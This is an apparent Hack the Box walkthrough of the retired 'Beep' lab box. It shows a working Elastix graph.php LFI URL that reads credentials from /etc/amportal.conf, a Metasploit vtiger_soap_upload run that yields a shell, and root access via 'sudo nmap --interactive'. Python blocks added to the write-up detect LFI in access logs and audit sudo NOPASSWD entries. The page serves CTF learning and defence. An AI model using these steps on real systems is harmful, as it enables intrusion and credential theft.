Hack the Box – Beep Walkthrough

Today we're going to solve another CTF machine, "Beep". It is now a retired box and can be accessed if you're a VIP member.

Introduction

Specifications

  • Target OS: Linux
  • Services: 22,25,80,110,111,143,443,993,995,3306,4445,10000
  • IP Address: 10.10.10.7
  • Difficulty: Medium

Weakness

  • LFI vulnerability
  • Sudo NOPASSWD

Contents

  • Getting user
  • Getting root

Table of Contents

Reconnaissance

Ports Scanning

Enumerate Directories

Method 2

Port Scanning

Enumerate Directories

Privilege Escalation

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

host        port   proto  name       state  info
----        ----   -----  ----       -----  ----
10.10.10.7  22     tcp    ssh        open   OpenSSH 4.3 protocol 2.0
10.10.10.7  25     tcp    smtp       open   Postfix smtpd
10.10.10.7  80     tcp    http       open   Apache httpd 2.2.3
10.10.10.7  110    tcp    pop3       open   Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  111    tcp    rpcbind    open   2 RPC #100000
10.10.10.7  143    tcp    imap       open   Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  443    tcp    ssl/http   open   Apache httpd 2.2.3 (CentOS)
10.10.10.7  993    tcp    ssl/imap   open   Cyrus imapd
10.10.10.7  995    tcp    pop3       open   Cyrus pop3d
10.10.10.7  3306   tcp    mysql      open   MySQL unauthorized
10.10.10.7  4445   tcp    upnotifyp  open
10.10.10.7  10000  tcp    http       open   MiniServ 1.570 Webmin httpd

We have quite a long list of services. HTTP is running, so that is our primary target now.

Enumerate Directories

We get a huge list of directories because there is an Elastix CMS installed on Apache.

Let's run searchsploit against Elastix.

To read the exploit:

searchsploit -x php/webapps/37637.pl

To copy the exploit to the current directory:

searchsploit -m php/webapps/37637.pl .
  Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
      URL: Elastix 2.2.0 - 'graph.php' Local File Inclusion - PHP webapps Exploit
     Path: /usr/share/exploitdb/platforms/php/webapps/37637.pl
Copied to: /root/Documents/hackthebox/10.10.10.7/37637.pl

The proof of concept is extremely simple. Browsing to https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action will expose the credentials for AMPortal.

The box is vulnerable to password reuse, and it is possible to SSH in directly as the root user with the AMPDBPASS password.
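As an added example (not part of the original walkthrough), the Python below shows the two things a defender takes from this LFI: the allowlist check a hardened graph.php would apply to current_language before including a file, and a scan of Apache access-log lines for the traversal plus null-byte pattern used in the proof of concept above. The allowlist values and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed allowlist standing in for the language codes graph.php should
# accept; the product's real list is not on the page.
ALLOWED_LANGUAGES = {"en_us", "es_es", "de_de"}

def is_safe_language(value):
    """Allowlist check a hardened graph.php could apply before include()."""
    return value in ALLOWED_LANGUAGES

def lfi_indicators(query):
    """Return LFI indicators found in a raw query string."""
    found = []
    # parse_qs percent-decodes once (so %00 becomes a NUL byte); the second
    # unquote catches double-encoded traversal such as %252e%252e%252f.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            value = unquote(value)
            if "../" in value or "..\\" in value:
                found.append(f"{name}: path traversal")
            if "\x00" in value:
                found.append(f"{name}: null-byte truncation")
            if re.search(r"/etc/|\.conf\b", value):
                found.append(f"{name}: sensitive path")
    return found

def scan_access_log(lines):
    """Return (path, indicators) for each request that shows LFI indicators."""
    hits = []
    for line in lines:
        match = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        indicators = lfi_indicators(url.query)
        if indicators:
            hits.append((url.path, indicators))
    return hits

# Constructed Apache access-log lines: one benign request and one carrying
# the walkthrough's proof-of-concept URL.
SAMPLE_LOG = [
    '10.10.14.5 - - [02/Dec/2018:23:10:01 +0000] "GET /vtigercrm/graph.php'
    '?current_language=en_us&module=Accounts HTTP/1.1" 200 512',
    '10.10.14.5 - - [02/Dec/2018:23:10:09 +0000] "GET /vtigercrm/graph.php'
    '?current_language=../../../../../../../..//etc/amportal.conf%00'
    '&module=Accounts&action HTTP/1.1" 200 2048',
]
```

Running scan_access_log(SAMPLE_LOG) flags only the second line, with all three indicators on current_language.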

Method 2

There’s another method to hack this box. Let’s start over again.

Port Scanning

The port scan is the same one shown above: HTTP is running, so that remains our primary target.

Enumerate Directories

We get a huge list of directories because there is an Elastix CMS installed on Apache.

The Elastix page presents a login form. We could either brute force it or look for an SQL injection vulnerability; I tried both but was unable to find a way in.

Let’s dig more into directories and see if we can find anything.

https://10.10.10.7/vtigercrm/

We can see another login portal, this time for vtiger CRM 5.1.0. The first thing we should do is searchsploit vtiger.

We found some Metasploit modules as well, so let's test them first to save time.

msf > search vtiger

Matching Modules
================

   Name                                   Disclosure Date  Rank       Description
   ----                                   ---------------  ----       -----------
   exploit/multi/http/vtiger_install_rce  2014-03-05       manual     Vtiger Install Unauthenticated Remote Command Execution
   exploit/multi/http/vtiger_php_exec     2013-10-30       excellent  vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution
   exploit/multi/http/vtiger_soap_upload  2013-03-26       excellent  vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload

We found our exploit; let's use it.

use exploit/multi/http/vtiger_soap_upload

After running the exploit we got an error; let's take a look at it.

If you remember, the server has SSL enabled as well, and this exploit has an option to support SSL. Let's enable it.

msf exploit(vtiger_soap_upload) > set SSL true
msf exploit(vtiger_soap_upload) > set RPORT 443

After running it again we got a shell.

Inside /home/fanis directory we have found our user.txt flag.

Privilege Escalation

It's time to get root.txt. We can use privilege escalation scripts to gather information, or we can do some manual research first to save time.

If you run sudo -l you can see many NOPASSWD commands, which can lead us to root.

sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

There's nmap, and if you google "nmap privilege escalation" you can find this command:

sudo nmap --interactive

Starting Nmap V. 4.11 ( Nmap: the Network Mapper - Free Security Scanner )
Welcome to Interactive Mode -- press h for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cd /root
ls -la
total 16308
drwxr-x---  2 root root     4096 Apr  7  2017 .
drwxr-xr-x 22 root root     4096 Dec  2 23:23 ..
-rw-------  1 root root     1130 Dec  4 13:06 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root root      100 Jan  6  2007 .cshrc
-rw-r--r--  1 root root      129 Jan  6  2007 .tcshrc
-rw-------  1 root root     6025 Apr  7  2017 anaconda-ks.cfg
-r-xr-xr-x  1 root root   190461 Aug 10  2011 elastix-pr-2.2-1.i386.rpm
-rw-r--r--  1 root root    18433 Apr  7  2017 install.log
-rw-r--r--  1 root root        0 Apr  7  2017 install.log.syslog
-rw-r--r--  1 root root        1 Apr  7  2017 postnochroot
-rw-------  1 root root       33 Apr  7  2017 root.txt
-r-xr-xr-x  1 root root 16358730 Oct 31  2011 webmin-1.570-1.noarch.rpm
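As an added example (not from the walkthrough), this Python parses the sudo -l listing above and reports every command that runs as root without a password and is not on an approved list, which is the audit a defender would run to catch entries such as nmap, whose old interactive mode the walkthrough abuses. The sample text is constructed from the page's own listing, and the approved set is a hypothetical policy input.

```python
import re

# Constructed from the `sudo -l` listing in the walkthrough above.
SUDO_L_OUTPUT = """\
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
"""

# One sudoers entry per line: "(runas) [NOPASSWD:] /path/to/command [args]".
# Lines without a leading "(runas)" group (Defaults, env_keep) are skipped.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tag>NOPASSWD:)?\s*(?P<cmd>\S+)")

def parse_sudo_l(text):
    """Parse `sudo -l` output into runas user, NOPASSWD flag and command."""
    entries = []
    for line in text.splitlines():
        match = ENTRY_RE.match(line)
        if match:
            entries.append({
                "runas": match.group("runas"),
                "nopasswd": match.group("tag") is not None,
                "cmd": match.group("cmd"),
            })
    return entries

def passwordless_root_commands(entries, approved=frozenset()):
    """Return root NOPASSWD commands not on the (hypothetical) approved list.

    Anything returned here deserves review: on this box /usr/bin/nmap is the
    entry the walkthrough turns into a root shell via Nmap 4.11's --interactive."""
    return sorted(e["cmd"] for e in entries
                  if e["runas"] == "root" and e["nopasswd"] and e["cmd"] not in approved)
```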